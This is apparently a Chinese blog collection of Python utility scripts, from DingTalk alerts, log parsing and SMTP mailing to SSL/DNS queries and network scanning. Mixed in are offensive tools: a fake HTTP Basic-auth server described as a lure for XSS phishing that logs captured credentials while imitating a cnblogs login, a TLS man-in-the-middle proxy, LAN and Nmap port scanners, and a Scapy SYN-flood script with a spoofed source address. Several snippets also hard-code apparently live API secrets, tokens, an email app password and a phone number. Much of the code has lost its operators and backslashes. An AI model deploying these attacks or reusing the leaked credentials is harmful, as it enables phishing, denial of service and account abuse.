封装钉钉通知接口: 接口的调用需要传入需要通知特定人的手机号,调用后会在顶顶群内通知.
代码语言:javascript复制import requests
import urllib.parse
import time,hmac,hashlib,base64,json
class DingToken():
def __init__(self,atAll,atMobiles):
self.atAll = atAll
self.atMobiles = atMobiles
def send_message(self,message):
timestamp = str(round(time.time() * 1000))
secret = 'SEC1018485caf7339e38530b4923ef3cfa164d03af6a79105af0013246048479bf1'
secret_enc = secret.encode('utf-8')
string_to_sign = '{}n{}'.format(timestamp, secret)
string_to_sign_enc = string_to_sign.encode('utf-8')
hmac_code = hmac.new(secret_enc, string_to_sign_enc, digestmod=hashlib.sha256).digest()
sign = urllib.parse.quote(base64.b64encode(hmac_code))
headers={'Content-Type': 'application/json'}
webhook = 'https://oapi.dingtalk.com/robot/send?access_token=0fe10f5f4e8dd74e6b90afb2f74b2b8a8aaa3bf246dccfead9d7395a56fae586×tamp=' timestamp "&sign=" sign
data = {
"msgtype": "text",
"text": {"content": message },
"at": {
"atMobiles": [ self.atMobiles ],
"isAtAll": self.atAll
}
}
requests.post(webhook, data=json.dumps(data), headers=headers)
# 发送警告信息
def send_warning(self,platform,address,send_date,message):
self.send_message(
"------------------------------------------------------- n"
"t {0} n"
"------------------------------------------------------- n"
"系统地址: t {1} n"
"告警日期: t {2} n"
"------------------------------------------------------- n"
"{3}"
"-------------------------------------------------------".
format(platform,address,send_date,message) )
if __name__ == "__main__":
# 参数1是否为全员,参数二需要at的手机号
ding = DingToken(False,"15646596977")
ding.send_warning("总部客服(呼叫中心)","192.168.1.1","2021:01:01","hello lyshark n")
计算范围时间戳: 编程实现在日志文件中提取出指定时间之内对应系统数据,用于通过时间戳定位时间区间.
代码语言:javascript复制import sys,os,time
import logging,datetime
def Write_Dictionaries(LogName,Dict):
logging.basicConfig(level=logging.DEBUG,
format = "%(created)d --> %(levelname)s --> %(asctime)s --> %(message)s",
datefmt = "%Y-%m-%d %H:%M:%S",
filename = LogName,
filemode = "a ")
logging.info(str(Dict))
def Read_Dictionaries(LogName,Start_Time,End_Time):
find_time_stamp = []
with open(LogName,"r",encoding="utf-8") as fp:
start = int(time.mktime(time.strptime(Start_Time,"%Y-%m-%d %H:%M:%S")))
end = int(time.mktime(time.strptime(End_Time,"%Y-%m-%d %H:%M:%S")))
for item in fp:
data = item.split(" --> ")
if int(data[0]) >= start and int(data[0]) <= end:
find_dict = eval(data[3].replace("n",""))
find_time_stamp.append(find_dict)
return find_time_stamp
if __name__ == "__main__":
for item in range(1,0):
dic = {"Address": "192.168.1.1", "CPU": str(item), "MEM": str(item*10), "IO": str(item/2)}
Write_Dictionaries("addr.log",dic)
time.sleep(1)
print("写入内容: {}".format(dic))
find_dict = Read_Dictionaries("addr.log","2020-03-19 16:10:43","2020-03-19 16:10:54")
for item in find_dict:
print("IP地址: {} CPU负载: {}".format(item.get("Address"),item.get("CPU")))
两个文本差异比对: 使用Python内置的模块就可以完成两个文件的差异比对,最后生成html表格方便展示.
代码语言:javascript复制import difflib
import argparse
import sys
# 创建打开文件函数,并按换行符分割内容
def readfile(filename):
try:
with open(filename, 'r') as fileHandle:
text = fileHandle.read().splitlines()
return text
except IOError as e:
print("Read file Error:", e)
sys.exit()
# 比较两个文件并输出到html文件中
def diff_file(filename1, filename2):
text1_lines = readfile(filename1)
text2_lines = readfile(filename2)
d = difflib.HtmlDiff()
# context=True时只显示差异的上下文,默认显示5行,由numlines参数控制,context=False显示全文,差异部分颜色高亮,默认为显示全文
result = d.make_file(text1_lines, text2_lines, filename1, filename2, context=True)
# 内容保存到result.html文件中
with open('result.html', 'w') as resultfile:
resultfile.write(result)
# print(result)
if __name__ == '__main__':
# 定义必须传入两个参数,使用格式-f1 filename1 -f2 filename
parser = argparse.ArgumentParser(description="传入两个文件参数")
parser.add_argument('-f1', action='store', dest='filename1', required=True)
parser.add_argument('-f2', action='store', dest='filename2', required=True)
given_args = parser.parse_args()
filename1 = given_args.filename1
filename2 = given_args.filename2
diff_file(filename1, filename2)
计算指定网段IP数量: 例如输入网段192.168.1.1/100则计算出这个网段范围内的所有主机数.
代码语言:javascript复制import os
def CalculationIP(Addr_Count):
ret = []
try:
IP_Start = str(Addr_Count.split("/")[0]).split(".")
IP_Heads = str(IP_Start[0] "." IP_Start[1] "." IP_Start[2] ".")
IP_Start_Range = int(Addr_Count.split(".")[3].split("/")[0])
IP_End_Range = int(Addr_Count.split("/")[1])
for item in range(IP_Start_Range,IP_End_Range 1):
ret.append(IP_Heads str(item))
return ret
except Exception:
return 0
if __name__ == "__main__":
ret = CalculationIP("192.168.1.1/100")
for item in range(len(ret)):
print("地址范围内的所有IP: {}".format(ret[item]))
使用PSutil库提取数据: 通过使用第三方工具库,提取出系统中的网络连接请求与进程线程的详细数据.
代码语言:javascript复制import psutil
# 获取到网卡的出口入口流量信息
def GetNetwork():
network = psutil.net_io_counters(pernic=True,nowrap=True)
for each in network.keys():
print("[*] 网卡: %-35s 发送/接收字节: %s/%s 发送/接收包数量: %s/%s"
%(each,network[each].bytes_sent,network[each].bytes_recv,
network[each].packets_sent,network[each].packets_recv))
# 获取到当前电脑中的网络连接状态: tcp tcp4 tcp6 udp inet4 inet6
def GetNetworkLink():
network = psutil.net_connections(kind="tcp")
AllowData = []
for each in network:
src_addr,src_port = each.laddr.ip,each.laddr.port
src_stats = each.status
src_pid = each.pid
if src_stats in ["ESTABLISHED","LISTEN"]:
process = psutil.Process(src_pid)
print("[ ] IP地址: s:%-5s PID: %5s 名称: %-10s"
%(src_addr,src_port,src_pid,process.name()))
AllowData.append([process.name(),src_port])
return AllowData
# 遍历整个系统中所有进程PID并取出关键数据
def GetProcessID():
for each in psutil.pids():
p = psutil.Process(int(each))
print("-" * 100)
print("进程: %s 线程数: %5s 内存利用率:%3s 进程创建时间: %-20s"
%(p.name(),p.num_threads(),int(p.memory_percent()),p.create_time()))
print("-" * 100)
print("CPU时间信息: {}".format(p.cpu_times()))
print("MEM内存信息: {}".format(p.memory_info()))
print("进程IO读写参数: {}".format(p.io_counters()))
print("进程对外SOCKET: {}".format(p.connections()))
print("r"*100)
简单实现密码登录验证: 在不使用数据库的情况下完成密码验证,密码的hash值对应的是123123
代码语言:javascript复制import os,time
import hashlib
db = [
{"user":"admin","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"},
{"user":"guest","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"},
{"user":"lyshark","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"}
]
def CheckUser(username,password):
hash = hashlib.md5()
for i in range(0,len(db)):
if db[i].get("user") == username:
if db[i].get("Flag") < "5":
hash.update(bytes(password,encoding="utf-8"))
if db[i].get("pass") == str(hash.hexdigest()):
db[i]['Flag'] = 0
return 1
else:
db[i]['Flag'] = str(int(db[i]['Flag']) 1)
return 0
else:
print("用户 {} 被永久限制登录".format(db[i].get("user")))
return 0
return 0
while(True):
username = input("输入用户名: ")
password = input("输入密码: ")
ret= CheckUser(username,password)
print("登录状态:",ret)
SQLite提取数据并绘图 通过使用matplotlib这个库函数,并提取出指定时间的数据记录,然后直接绘制曲线图.
代码语言:javascript复制import os,time,datetime
import sqlite3
import numpy as np
from matplotlib import pyplot as plt
def TimeIndex(db,table,start,ends):
start_time = int(time.mktime(time.strptime(start,"%Y-%m-%d %H:%M:%S")))
end_time = int(time.mktime(time.strptime(ends,"%Y-%m-%d %H:%M:%S")))
conn = sqlite3.connect(db)
cursor = conn.cursor()
select = "select * from {} where time >= {} and time <= {}".format(table,start_time,end_time)
return cursor.execute(select).fetchall()
def Display():
temp = TimeIndex("data.db","lyshark","2019-12-12 14:28:00","2019-12-12 14:29:00")
list = []
for i in range(0,len(temp)):
list.append(temp[i][1])
plt.title("CPU Count")
plt.plot(list, list)
plt.show()
if __name__ == "__main__":
Display()
将图片转为字符图片: 通过pillow图片处理库,对图片进行扫描,然后用特殊字符替换图片的每一个位,生成的字符图片.
代码语言:javascript复制from PIL import Image
import argparse
# 将256灰度平均映射到70个字符上
def get_char(r,g,b,alpha = 256):
ascii_char = list("~!@#$%^&*()_ ")
if alpha == 0:
return " "
length = len(ascii_char)
gray = int(0.2126 * r 0.7152 * g 0.0722 * b)
unit = (256.0 1)/length
return ascii_char[int(gray/unit)]
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--file",dest="file",help="指定一个图片文件")
parser.add_argument("--width",dest="width",type=int,default=50,help="指定图片宽度")
parser.add_argument("--height",dest="height",type=int,default=25,help="指定图片高度")
args = parser.parse_args()
# 使用方式: pip install pillow | main.py --file=xxx.jpg
if args.file != None:
img = Image.open(args.file)
img = img.resize((args.width,args.height), Image.NEAREST)
txt = ""
for row in range(args.height):
for cow in range(args.width):
txt = get_char(*img.getpixel((cow,row)))
txt = "n"
print(txt)
else:
parser.print_help()
针对视频转为字符串: 通过opencv库实现对指定MP4文件替换为字符串格式,并播放出来.
代码语言:javascript复制# pip install opencv-python
import cv2,os,argparse
def PlayCharMP4(file_name,heigth,width):
ascii_char = list("~!@#$%^&*()_ /-,.;:'{}[]=qwertyuiokjhgfd")
char_len = len(ascii_char)
vc = cv2.VideoCapture(file_name) # 加载一个视频
if vc.isOpened(): # 判断是否正常打开
rval,frame = vc.read()
else:
rval = False
frame_count,outputList = 0,[]
while rval: # 循环读取视频帧
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # 转化成灰度图
gray = cv2.resize(gray,(width,heigth)) # 重置图片大小
text = ""
for pixel_line in gray: # 循环处理行
for pixel in pixel_line: # 循环处理列
text = ascii_char[int(pixel / 256 * char_len )]
text = "n"
outputList.append(text)
frame_count = frame_count 1
if frame_count % 100 == 0:
print("处理视频: " str(frame_count) " 帧")
rval, frame = vc.read()
for frame in outputList: # 读取处理后的每一帧
os.system("cls") # 清屏
print(frame) # 打印每一帧
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--file",dest="file",help="指定一个MP4文件")
args = parser.parse_args()
if args.file != None:
PlayCharMP4(args.file,30,80)
else:
parser.print_help()
调用百度翻译API: 调用百度翻译API完成翻译任务.
代码语言:javascript复制import requests
import string
import time
import hashlib
import json
api_url = "http://api.fanyi.baidu.com/api/trans/vip/translate"
my_appid = "20220303001108300"
cyber = "pZmk93BeezwigjmjkOYS"
lower_case = list(string.ascii_lowercase)
def requests_for_dst(word):
#init salt and final_sign
salt = str(time.time())[:10]
final_sign = str(my_appid) word salt cyber
final_sign = hashlib.md5(final_sign.encode("utf-8")).hexdigest()
#区别en,zh构造请求参数
if list(word)[0] in lower_case:
paramas = {
'q':word,
'from':'en',
'to':'zh',
'appid':'%s'%my_appid,
'salt':'%s'%salt,
'sign':'%s'%final_sign
}
my_url = api_url '?appid=' str(my_appid) '&q=' word '&from=' 'en' '&to=' 'zh' '&salt=' salt '&sign=' final_sign
else:
paramas = {
'q':word,
'from':'zh',
'to':'en',
'appid':'%s'%my_appid,
'salt':'%s'%salt,
'sign':'%s'%final_sign
}
my_url = api_url '?appid=' str(my_appid) '&q=' word '&from=' 'zh' '&to=' 'en' '&salt=' salt '&sign=' final_sign
response = requests.get(api_url,params = paramas).content
content = str(response,encoding = "utf-8")
json_reads = json.loads(content)
print(json_reads['trans_result'][0]['dst'])
while True:
word = input("输入文本 -> ")
requests_for_dst(word)
统计网站访问日志: 实现统计网站访问日志,并得到字典类型返回值.
代码语言:javascript复制import os,json
def Count_Flag_And_Flow(file):
list = []
flag = {}
with open(file) as f:
contexts = f.readlines()
for line in contexts:
it = line.split()[8]
list.append(it)
list_num = set(list)
for item in list_num:
num = list.count(item)
flag[item] = num
return flag
def Count_Flag_And_Type(file):
list = []
flag = {}
with open(file) as f:
contexts = f.readlines()
for line in contexts:
list.append( line.split()[12].replace("(","").replace(")",""))
list_num = set(list)
for item in list_num:
num = list.count(item)
flag[item] = num
return flag
def Count_Time_And_Flow(file):
times = {} # key 保存当前时间信息
flow = {} # value 当前时间流量总和
Count= 0 # 针对IP地址的计数器
with open(file) as f:
contexts = f.readlines()
for line in contexts:
if line.split()[9] != "-" and line.split()[9] != '"-"':
size = line.split()[9]
temp = line.split()[3]
ip_attr = temp.split(":")[1] ":" temp.split(":")[2]
Count = int(size) Count
if ip_attr in times.keys():
flow[ip_attr] = flow[ip_attr] int(size)
else:
times[ip_attr] = 1
flow[ip_attr] = int(size)
return flow
if __name__ =="__main__":
Address = Count_Flag_And_Flow("d://access.log")
print(Address)
Types = Count_Flag_And_Type("d://access.log")
print(Types)
OutFlow = Count_Time_And_Flow("d://access.log")
print(OutFlow)
SMTPlib发送邮件: 简单封装一个SMTP邮件发送功能,传值即可直接使用.
代码语言:javascript复制import smtplib
from email.mime.text import MIMEText
# 登录邮箱服务器
mail_host = 'smtp.qq.com'
mail_user = '1181506874@qq.com'
mail_pass = 'wrpmzkalqqvhhijc'
# 调用发信函数
def SendMail(sender_user,recivers_user,title,subject,is_ssl = False):
# 邮件发送方邮箱地址
sender = sender_user
receivers = [recivers_user]
# 设置email信息
# message = MIMEText(subject,'plain','utf-8')
message = MIMEText(subject, 'html', 'utf-8')
message['Subject'] = title
message['From'] = sender
message['To'] = receivers[0]
# 登录并发送邮件
try:
if is_ssl != True:
smtpObj = smtplib.SMTP()
smtpObj.connect(mail_host,25)
smtpObj.login(mail_user,mail_pass)
else:
smtpObj = smtplib.SMTP()
smtpObj.connect(mail_host, 25)
smtpObj = smtplib.SMTP_SSL(mail_host)
smtpObj.login(mail_user, mail_pass)
# 发送
smtpObj.sendmail(sender,receivers,message.as_string())
smtpObj.quit()
return True
except smtplib.SMTPException as e:
return False
if __name__ == "__main__":
# sender_user 发送方邮箱
# recivers_user 接收方邮箱
# title 发送标题
# subject 正文
# is_ssl 是否开启SSL
ref = SendMail("1181506874@qq.com","lysharks@163.com","Flask 邮箱验证码",
"<p>您本次的验证码是: 1Ae3 有效期10分钟. </p><br><br> "
"更多内容请访问: <a href='https://www.baidu.com'>www.baidu.com</a>",False)
print(ref)
构建简易HTTPBasic认证: Basic认证是由web服务器提供的一种轻便的身份校验方式,此处实现的工具可用于XSS内嵌钓鱼.
代码语言:javascript复制import socketserver
import http.server
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if str(self.headers).find('UserLogin=1') > 0:
self.send_response(302)
self.send_header('Location', 'https://account.cnblogs.com/signin')
self.end_headers()
else:
if str(self.headers).find('Authorization: Basic ') > 0:
self.send_response(302)
self.send_header('Set-Cookie', 'UserLogin=1')
self.send_header('Location', 'https://account.cnblogs.com/signin')
print("------------------------------------------------------------")
print(str(self.headers))
else:
self.send_response(401)
self.send_header('Content-type', 'text/html; charset=UTF-8')
self.send_header('WWW-Authenticate',
'Basic realm="Session Out Of Date, Please Login again [account.cnblogs.com]"')
self.end_headers()
httpd = socketserver.TCPServer(("0.0.0.0", 9999), RequestHandler)
httpd.serve_forever()
获取DNS证书时间: 通过使用SSL
类我们可以直接对一个网站解析出其SSL证书信息.
import ssl,sys,socket
def GetSSL_DNS(hostname):
host=str(hostname).rstrip().lstrip()
try:
ctx = ssl.create_default_context()
sock = ctx.wrap_socket(socket.socket(), server_hostname=hostname)
sock.settimeout(5)
sock.connect((host, 443))
crt = sock.getpeercert()
print("组织单位: {}".format(crt["subject"][2][0][1]))
print("通用名: {}".format(crt["issuer"][2][0][1]))
print("序列号: {}".format(crt["serialNumber"]))
print("起始时间: {} ".format(crt["notBefore"]))
print("终止时间: {} ".format(crt["notAfter"]))
print('-------- 针对域名 {} DNS的列表 --------'.format(hostname))
for item in crt['subjectAltName']:
print("DNS: {}".format(item[1]))
except Exception:
pass
if __name__ == "__main__":
try:
if sys.argv[1]:
GetSSL_DNS(sys.argv[1])
except Exception:
print("[-] 请输入一个域名: baidu.com")
pass
DNS模块查域名解析: 使用 DNS-Python 这个模块来查询特定的一个或一组域名的所有解析记录.
代码语言:javascript复制# pip install dnspython
import os
import dns.resolver
from collections import defaultdict
domain = "baidu.com"
A = dns.resolver.query(domain,"A")
for x in A.response.answer:
for y in x.items:
print("查询到A记录:{} ".format(y))
print("*"*50)
MX = dns.resolver.query(domain,"MX")
for x in MX:
print("MX交换数值 {} MX记录:{} ".format(x.preference,x.exchange))
print("*"*50)
NS = dns.resolver.query(domain,"NS")
for x in NS.response.answer:
for y in x.items:
print("NS名称服务:{} ".format(y.to_text()))
# -------------------------------------------------------------------------
hosts = ["baidu.com","weibo.com","sina.com"]
IP_List = defaultdict(list)
def query(hosts):
for host in hosts:
ip = dns.resolver.query(host,"A")
for i in ip:
IP_List[host].append(i)
return IP_List
for i in query(hosts):
print(i,IP_List[i])
解析HTTP服务状态: 通过调用pycurl模块对指定的Web服务器进行健康状态监测.
代码语言:javascript复制import pycurl,certifi
from io import BytesIO
headers = ['Accept:*/*','User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0']
def header_function(header_line):
header_line = header_line.decode("utf-8")
#print(header_line.split(":"))
class ex_response(object):
def __init__(self,url):
self.buffer = BytesIO() # 创建缓存对象
self.c = pycurl.Curl() # 创建curl实例
self.c.setopt(pycurl.URL,url) # 设置资源路径
self.c.setopt(pycurl.CAINFO,certifi.where()) # 设置指定证书验证包(http页面需要去掉本行)
self.c.setopt(pycurl.WRITEDATA, self.buffer)
self.c.setopt(pycurl.WRITEHEADER,self.buffer)
self.c.setopt(self.c.HTTPHEADER,headers) # 设置HTTP头
self.c.setopt(pycurl.HEADERFUNCTION, header_function) # 调用外部函数
try:
self.c.perform()
except Exception:
self.buffer.close()
self.c.close()
def getinfo(self):
h1 = self.c.getinfo(pycurl.HTTP_CODE) # 状态码
h2 = self.c.getinfo(pycurl.TOTAL_TIME) # 传输结束总消耗时间
h3 = self.c.getinfo(pycurl.NAMELOOKUP_TIME) # DNS解析时间
h4 = self.c.getinfo(pycurl.CONNECT_TIME) # 建立连接时间
h5 = self.c.getinfo(pycurl.PRETRANSFER_TIME) # 建立连接到准备传输消耗时间
h6 = self.c.getinfo(pycurl.STARTTRANSFER_TIME) # 从建立连接到传输开始消耗时间
h7 = self.c.getinfo(pycurl.REDIRECT_TIME) # 重定向消耗时间
h8 = self.c.getinfo(pycurl.SIZE_UPLOAD) # 上传数据包大小
h9 = self.c.getinfo(pycurl.SIZE_DOWNLOAD) # 下载数据包大小
h10 = self.c.getinfo(pycurl.SPEED_DOWNLOAD) # 平均下载速度
h11 = self.c.getinfo(pycurl.SPEED_UPLOAD) # 平均上传速度
h12 = self.c.getinfo(pycurl.HEADER_SIZE) # http头文件大小
info ='''
http状态码:%s
传输结束总时间:%.2f ms
DNS解析时间:%.2f ms
建立连接时间:%.2f ms
准备传输时间:%.2f ms
传输开始时间:%.2f ms
重定向时间:%.2f ms
上传数据包大小:%d bytes/s
下载数据包大小:%d bytes/s
平均下载速度:%d bytes/s
平均上传速度:%d bytes/s
http头文件大小:%d byte
''' %(h1,h2*1000,h3*1000,h4*1000,h5*1000,h6*1000,h7*1000,h8,h9,h10,h11,h12)
print(info)
self.buffer.close()
self.c.close()
if __name__ == "__main__":
curl_respon = ex_response("https://www.baidu.com")
curl_respon.getinfo()
模拟Proxy实现MITM: 假设已经获取server端和客户端的证书,此脚本可以伪造客户端和服务端,实现MITM的场景。
代码语言:javascript复制import socket
import ssl
import threading
import queue
import time
fromCliQueue = queue.Queue()
fromSrvQueue = queue.Queue()
sFlag = False
## Client -- proxyServer -- proxyClient -- Server
class proxyClient(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.sock = None
self.ssl_context = ssl.create_default_context(cafile='RootCA.pem')
self.ssl_context.load_cert_chain("Client.pem", "Client.key")
self.ssl_context.protocol = ssl.PROTOCOL_TLSv1_2
self.ssl_context.check_hostname = False
def run(self):
global fromCliQueue
global fromSrvQueue
while True:
#if mesg queue from client is not empty, send it to server and recv response
if not fromCliQueue.empty():
if self.sock is None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
self.sock.connect(('127.0.0.1', 9999))
else:
sdata = fromCliQueue.get()
print("[proxyClient]send to server: {}".format(sdata))
self.sock.send(sdata)
rdata = self.sock.recv(4096)
#解决recv总是收到空字符
if rdata != b'':
print("[proxyClient]recv from server: {}".format(rdata))
fromSrvQueue.put(rdata)
self.sslDetected(rdata)
def sslDetected(self, data):
if b'x01x00x00x00' in data:
self.sock = self.ssl_context.wrap_socket(self.sock)
print("[proxyClient]ssl neogotiation")
return True
else:
return False
class proxyServer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind(('127.0.0.1',8888))
self.sock.listen(1)
self.ssl_context = ssl.SSLContext()
# self.ssl_context.verify_mode = ssl.CERT_REQUIRED
self.ssl_context.load_verify_locations(cafile='RootCA.pem')
# self.ssl_context.check_hostname = False
# test this protocol with client's PROTOCOL_TLSv1_2
self.ssl_context.protocol = ssl.PROTOCOL_TLS_SERVER
self.ssl_context.load_cert_chain("Server.pem", "Server.key")
def run(self):
global fromSrvQueue
global fromCliQueue
self.proxySocket, addr = self.sock.accept()
while self.proxySocket:
rdata = self.proxySocket.recv(4096)
if rdata != b'':
print("[proxyServer]recv from client: {}".format(rdata))
fromCliQueue.put(rdata)
while True:
if fromSrvQueue.empty():
time.sleep(1)
continue
else:
sdata = fromSrvQueue.get()
print("[proxyServer]send to client: {}".format(sdata))
self.proxySocket.send(sdata)
self.sslDetected(sdata)
break;
def sslDetected(self, data):
if b'x01x00x00x00' in data:
self.proxySocket = self.ssl_context.wrap_socket(self.proxySocket, server_side=True)
print("[proxyClient]ssl neogotiation")
return True
else:
return False
if __name__ == "__main__":
proxyCli = proxyClient()
proxyCli.daemon = True
proxyCli.start()
proxySrv = proxyServer()
proxySrv.daemon = True
proxySrv.start()
proxySrv.join()
计算ICMP校验和: 校验和的目的是计算数据包完整性,防止数据包被非法损坏, 在ICMP数据包发送时,会自动计算校验和并将其设置到ICMP报文中,在目标设备收到后再次计算校验和,并与数据包中的校验和作比较,从而判断该ICMP包是否正常.
代码语言:javascript复制import os,sys
# 计算并返回校验和字段
def icmp_chesksum(message):
# 获取传入的数据包长度
length = len(message)
# 将校验和计算总数全部增加到 sum_number_count 中.
sum_number_count = 0
# 判断数据包是否为偶数
mold_taking = length % 2
# 循环计算,每次取出2个字节,相加.
for i in range(0, length - mold_taking, 2):
# 将数据以每两个字节(十六进制)通过ord转十进制,第一字节在低位,第二个字节在高位
sum_number_count = ord(message[i]) (ord(message[i 1]) << 8)
# 传入的数据长度是奇数则执行,且把这个字节(8位)加到前面的结果
if mold_taking:
sum_number_count = ord(message[-1])
# 将数据包中高于16位与低16位相加
sum_number_count = (sum_number_count >> 16) (sum_number_count & 0xffff)
# 如果还有高于16位,将继续与低16位相加
sum_number_count = (sum_number_count >> 16)
# 对sum取反(返回十进制)
answer = ~sum_number_count & 0xffff
# 主机字节序转网络字节序
answer = answer >> 8 | (answer << 8 & 0xff00)
return answer
def get_check_sum():
type = "x08" # 8代表ICMP回显类型
code = "x00" # 此处必须为0
checksum = "x00x00" # 设置校验和字段为空
id = "x00x01" # 设置ICMP序号,默认是1
sequece = "x00x01" # 执行序号
body = "abcdefghijklmnopqrstuvwabcdefghi" # 发送正文内容
# 封装为一个ICMP报文格式
icmp_message = type code checksum id sequece body
# 计算并返回校验和
ref = icmp_chesksum(icmp_message)
return ref
if __name__ == "__main__":
checksum = get_check_sum()
print("十进制校验和: {:d}".format(checksum))
发送ICMP原始数据包: 接着就是来实现构建并发送socket.SOCK_RAW
原始数据包,发送的实现细节与上方解包原理完全一致.
import socket,time
def raw_socket(dst_addr,imcp_packet):
# 构建原始数据包,发送类型为ICMP协议
rawsocket = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.getprotobyname("icmp"))
# 记录当前请求时间
send_request_time = time.time()
# 一次性发送出去,并等待返回的时间和套接字句柄
rawsocket.sendto(imcp_packet,(dst_addr,80))
return send_request_time,rawsocket,dst_addr
if __name__ == "__main__":
send_request_time,rawsocket,dst_addr = raw_socket("8.141.58.64",bytes("hello lyshark",encoding="utf-8"))
print("发送时间戳: {} --> 发送IP: {} --> 数据包句柄: {}".format(send_request_time,dst_addr,rawsocket))
寻找内网路由地址: 除了设置socket.SOCK_RAW
原始数据包模式外,Python还可以设置socket.SOCK_STREAM
数据流模式,使用该模式还可实现扫描内网分布主机情况.
例如: 通过本地网段计算出C段IP地址,然后调用Check方法扫描目标网段内是否存在80端口开放的主机.
代码语言:javascript复制import socket,threading
routers = []
lock = threading.Lock()
def search_router():
all_thread = []
local_ip = socket.gethostbyname_ex(socket.gethostname())[2]
print("本地接口: " str(local_ip))
for ip in local_ip:
for i in range(1, 255):
array = ip.split('.')
array[3] = str(i)
addr = '.'.join(array)
thread = threading.Thread(target=check, args=(addr,))
thread.start()
all_thread.append(thread)
for item in all_thread:
item.join()
def check(addr):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((addr, 80))
sock.close()
if result == 0:
lock.acquire()
print("该网段路由器可能是: {}".format(addr))
routers.append((addr, 80))
lock.release()
if __name__ == "__main__":
search_router()
Nmap 搜索网段主机并绘图: 首先电脑中必须安装Nmap,然后使用如下脚本统计内网主机数,并最后绘制饼图展示.
代码语言:javascript复制# pip install numpy matplotlib -i https://pypi.tuna.tsinghua.edu.cn/simple
import os,nmap,time
import numpy as np
from matplotlib.pylab import *
def ScanPort(addr):
port =[]
flag = {}
dic = {"WebServer":0,"MySQL":0,"SSH":0,"MSSQL":0,"FTP":0,"Danger":0}
Nmap = nmap.PortScanner()
try:
ret = Nmap.scan(hosts=addr,arguments="-PS")
for item in Nmap.all_hosts():
try:
temp = list(ret["scan"][item]["tcp"].keys())
print("[*] IP地址: s 开放端口: %s"%(item,temp))
port.extend(temp)
except Exception:
pass
except Exception:
print("[-] Nmap 端口扫描异常,程序被迫终止.")
exit(0)
list_num = set(port)
for item in list_num:
num = int(port.count(item))
flag[item] = num
dic["WebServer"] = flag.get(80)
dic["MySQL"] = flag.get(3306)
dic["SSH"] = flag.get(22)
dic["MSSQL"] = flag.get(1433)
dic["FTP"] = flag.get(21)
dic["Danger"] = flag.get(135) flag.get(139) flag.get(445)
print("[ ] 服务统计: {}".format(dic))
mpl.rcParams["font.sans-serif"] = ["KaiTi"]
label = list(dic.keys())
fracs = list(dic.values())
plt.axes(aspect=1)
plt.pie(x=fracs,labels=label,autopct="
%%")
plt.savefig("scan.png")
if __name__ == "__main__":
ScanPort("192.168.1.0/24")
使用Scapy制造SYN洪泛攻击: 使用Scapy制造一些再有TCP协议层的IP数据包,让这些包TCP源端口不断地自增一,而目的TCP端口513不变。
代码语言:javascript复制#coding=utf-8
from scapy.all import *
def synFlood(src, tgt):
# TCP源端口不断自增一,而目标端口513不变
for sport in range(1024, 65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=sport, dport=513)
pkt = IPlayer / TCPlayer
send(pkt)
src = "192.168.220.132"
tgt = "192.168.220.128"
synFlood(src, tgt)